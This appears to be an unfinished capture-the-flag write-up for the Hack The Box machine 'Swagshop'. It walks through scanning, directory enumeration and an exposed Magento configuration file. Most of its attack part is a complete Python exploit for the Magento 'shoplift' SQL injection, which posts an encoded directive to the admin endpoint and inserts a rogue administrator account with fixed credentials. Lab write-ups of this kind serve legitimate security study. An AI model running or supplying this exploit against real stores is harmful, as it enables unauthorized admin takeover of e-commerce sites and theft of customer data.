10.10.10.140 - Swagshop
Run an Nmap scan on the 10.10.10.140 host, specifying -Sv for service detection:
We learn that the host is running Ubuntu server Xenial release by cross referencing the service version with Ubuntu launchpad repository:
Apache server 2.4.18 is also present indicating web application running on port 80. Dirbuster was used to map the directories structure:
CMS providing the "user experience" is based on Magneto from 2014:
One of the files responsible for configuration was exposed on port 80, revealing root password:
http://10.10.10.140/app/etc/local.xml
10.10.10.140
MagnetoConnect manager is present at http://10.10.10.140/downloader revealing version 1.9.0
Vulnerability research:
1
import requests
2
import base64
3
import sys
4
5
target = sys.argv[1]
6
7
if not target.startswith("http"):
8
target = "http://" + target
9
10
if target.endswith("/"):
11
target = target[:-1]
12
13
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
14
15
# For demo purposes, I use the same attack as is being used in the wild
16
SQLQUERY="""
17
SET @SALT = 'rp';
18
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
19
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
20
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
21
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
22
"""
23
24
# Put the nice readable queries into one line,
25
# and insert the username:password combinination
26
query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
27
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
28
29
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
30
r = requests.post(target_url,
31
data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
32
"filter": base64.b64encode(pfilter),
33
"forwarded": 1})
34
if r.ok:
35
print "WORKED"
36
print "Check {0}/admin with creds ypwq:123".format(target)
37
else:
38
print "DID NOT WORK"
Copied!
Successful login to an administration panel:
New created credentials were valid for MagnetoConnect Manager as well:
WIP
Copy link